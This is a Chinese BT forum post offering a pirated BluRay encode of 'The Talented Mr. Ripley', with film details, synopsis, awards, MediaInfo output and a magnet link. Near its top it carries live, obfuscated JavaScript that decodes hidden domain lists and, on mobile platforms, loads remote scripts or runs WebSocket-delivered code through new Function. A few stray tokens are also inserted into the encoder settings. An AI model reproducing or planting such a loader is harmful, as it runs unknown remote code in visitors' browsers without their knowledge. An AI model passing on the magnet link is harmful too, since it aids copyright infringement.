天才瑞普利[简繁字幕].The.Talented.Mr.Ripley.1999.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 13.03GB

版主小s 1月前 128

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 天才瑞普利/天才先生瑞普利/天才里普雷先生/天才雷普利(台)/心计(港)/美男心计

◎片 名 The Talented Mr. Ripley

◎年 代 1999

◎产 地 美国

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 英语,意大利语

◎上映日期 1999-12-25(美国)

◎豆瓣评分 8.2/10 from 133091 users

◎豆瓣链接 https://movie.douban.com/subject/1295045/

◎片 长 139分钟

◎导 演 安东尼·明格拉 Anthony Minghella

◎编 剧 派翠西亚·海史密斯 Patricia Highsmith / 安东尼·明格拉 Anthony Minghella

◎主 演 马特·达蒙 Matt Damon

格温妮斯·帕特洛 Gwyneth Paltrow

裘德·洛 Jude Law

凯特·布兰切特 Cate Blanchett

菲利普·塞默·霍夫曼 Philip Seymour Hoffman

杰克·达文波特 Jack Davenport

詹姆斯·瑞布霍恩 James Rebhorn

赛尔乔·鲁比尼 Sergio Rubini

菲利普·贝克·霍尔 Philip Baker Hall

西利亚·维斯顿 Celia Weston

Fiorello Fiorello

斯特凡妮娅·罗卡 Stefania Rocca

Ivano Marescotti Ivano Marescotti

安娜·隆姬 Anna Longhi

丽莎·艾科恩 Lisa Eichhorn

格雷琴· 易葛夫 Gretchen Egolf

安东尼奥·普雷斯特 Antonio Prester

Massimo Reale Massimo Reale

Caterina Deregibus Caterina Deregibus

吉安弗兰科·巴拉 Gianfranco Barra

雷纳托·斯卡帕 Renato Scarpa

迪尔德丽·罗夫乔 Deirdre Lovejoy

布赖恩·塔伦蒂诺 Brian Tarantina

Bernardo Sassetti Bernardo Sassetti

Byron Wallen Byron Wallen

贝佩·费奥雷罗 Beppe Fiorello

亚历山德拉万齐 Alessandra Vanzi

保罗·卡拉布雷西 Paolo Calabresi

Manuel Ruffini Manuel Ruffini

切萨雷·克雷莫尼尼 Cesare Cremonini

多米尼克·福穆萨 Dominic Fumusa

◎标 签 犯罪 | 美国 | 悬疑 | MattDamon | 剧情 | JudeLaw | 天才雷普利 | 美国电影

◎简 介

年轻有钱又置身于意大利的艳阳下,这是汤姆·瑞普利(马特·达蒙 Matt Damon 饰)所渴望的生活,却是迪基·格林利(裘德·洛 Jude Law 饰)早已拥有的东西。

瑞普利是个出身平凡,生活也毫无值得炫耀的年轻人,他受到一个富商之托,到意大利去游说他号荡不羁的儿子迪 基,重回他的家乡美国。但是当瑞普利一到那里,就深深地被迪基的生活形态所迷惑:美丽的别墅、高级浮华的度假饭店、一掷千金的奢靡生活,以及他美丽温柔的女友,都令他羡慕不已。

由于瑞普利一心觊觎迪基的生活,最后这样的欲望竟扩张成想要将迪基取而代之,他缜密的心思不仅令人咋舌,而冷静的犯罪手法更教人措手不及。就在他陶醉于亲手打造的美梦中时,瑞普利因为一次意外的巧合害他露出了马脚,于是引起警方的注意并展开调查……

本片改编自女作家派翠西亚·海史密斯写于1955年的同名小说,法国导演雷内·克莱芒曾于1960年拍摄过一部以该小说为蓝本的电影《太阳背面》,由法国影星阿兰·德隆主演。

◎获奖情况

第72届奥斯卡金像奖 ?(2000)

最佳男配角(提名) 裘德·洛

最佳改编剧本(提名) 安东尼·明格拉

最佳艺术指导(提名) 布鲁诺·切萨里?/?罗伊·沃克

最佳服装设计(提名) 安·罗斯?/?加里·琼斯

最佳原创配乐(提名) 盖布瑞·雅德

第50届柏林国际电影节 ?(2000)

金熊奖(提名) 安东尼·明格拉

第57届金球奖 ?(2000)

电影类最佳剧情片(提名)

电影类最佳导演(提名) 安东尼·明格拉

电影类剧情片最佳男主角(提名) 马特·达蒙

电影类最佳男配角(提名) 裘德·洛

电影类最佳原创配乐(提名) 盖布瑞·雅德

第53届英国电影学院奖 ?(2000)

电影奖最佳影片(提名) 威廉·霍尔伯格?/?汤姆·斯滕伯格

电影奖最佳导演(提名) 安东尼·明格拉

电影奖最佳男配角 裘德·洛

电影奖最佳女配角(提名) 凯特·布兰切特

电影奖最佳改编剧本(提名) 安东尼·明格拉

电影奖最佳摄影(提名) 约翰·希尔

电影奖最佳原创音乐(提名) 盖布瑞·雅德

  1. General

  2. Unique ID : 18620412225535014710160484163815216456 (0xE022933E6B3F05377B3E90DF3601548)

  3. Complete name : The.Talented.Mr..Ripley.1999.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.0 GiB

  7. Duration : 2 h 19 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 13.4 Mb/s

  10. Encoded date : UTC 2021-07-02 08:54:58

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 19 min

  20. Bit rate : 10.6 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 032 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.224

  30. Stream size : 10.3 GiB (79%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 10637 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1032 / interlace=0 / total-frames=200117 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=19.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 2 h 19 min

  48. Bit rate mode : Variable

  49. Bit rate : 2 242 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 16 bits

  55. Compression mode : Lossless

  56. Stream size : 2.18 GiB (17%)

  57. Title : English DTS-HD Master Audio 5.1 @ 2242 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : DTS

  64. Format/Info : Digital Theater Systems

  65. Codec ID : A_DTS

  66. Duration : 2 h 19 min

  67. Bit rate mode : Constant

  68. Bit rate : 318 kb/s

  69. Channel(s) : 2 channels

  70. Channel layout : L R

  71. Sampling rate : 48.0 kHz

  72. Frame rate : 93.750 FPS (512 SPF)

  73. Bit depth : 24 bits

  74. Compression mode : Lossy

  75. Stream size : 316 MiB (2%)

  76. Title : English DTS 2.0 @ 320 kbps Commentary

  77. Language : English

  78. Default : No

  79. Forced : No


  80. Text #1

  81. ID : 4

  82. Format : PGS

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 2 h 18 min

  86. Bit rate : 33.8 kb/s

  87. Count of elements : 3547

  88. Stream size : 33.4 MiB (0%)

  89. Title : Eng/SUP

  90. Language : English

  91. Default : No

  92. Forced : No


  93. Text #2

  94. ID : 5

  95. Format : PGS

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 2 h 13 min

  99. Bit rate : 28.0 kb/s

  100. Count of elements : 3499

  101. Stream size : 26.7 MiB (0%)

  102. Title : Chs/SUP 简体

  103. Language : Chinese

  104. Default : Yes

  105. Forced : No


  106. Text #3

  107. ID : 6

  108. Format : PGS

  109. Codec ID : S_HDMV/PGS

  110. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration : 2 h 13 min

  112. Bit rate : 28.5 kb/s

  113. Count of elements : 3499

  114. Stream size : 27.2 MiB (0%)

  115. Title : Cht/SUP 繁体

  116. Language : Chinese

  117. Default : No

  118. Forced : No


  119. Text #4

  120. ID : 7

  121. Format : PGS

  122. Codec ID : S_HDMV/PGS

  123. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  124. Duration : 2 h 12 min

  125. Bit rate : 60.9 kb/s

  126. Count of elements : 3116

  127. Stream size : 57.7 MiB (0%)

  128. Title : Chs/SUP 简英双语

  129. Language : Chinese

  130. Default : No

  131. Forced : No


  132. Text #5

  133. ID : 8

  134. Format : PGS

  135. Codec ID : S_HDMV/PGS

  136. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  137. Duration : 2 h 12 min

  138. Bit rate : 61.7 kb/s

  139. Count of elements : 3116

  140. Stream size : 58.5 MiB (0%)

  141. Title : Cht/SUP 繁英双语

  142. Language : Chinese

  143. Default : No

  144. Forced : No


  145. Menu

  146. 00:00:00.000 : en:第 01 章

  147. 00:11:20.889 : en:第 02 章

  148. 00:14:22.195 : en:第 03 章

  149. 00:18:21.434 : en:第 04 章

  150. 00:32:59.394 : en:第 05 章

  151. 00:42:50.693 : en:第 06 章

  152. 00:49:13.868 : en:第 07 章

  153. 00:58:51.903 : en:第 08 章

  154. 01:03:45.655 : en:第 09 章

  155. 01:19:52.121 : en:第 10 章

  156. 01:27:47.095 : en:第 11 章

  157. 01:38:10.802 : en:第 12 章

  158. 01:53:24.840 : en:第 13 章

  159. 01:59:29.371 : en:第 14 章

  160. 02:05:49.917 : en:第 15 章


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:01C8F33C2AC611B72C0B8FEF42DAB7BAD9E22BAE
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回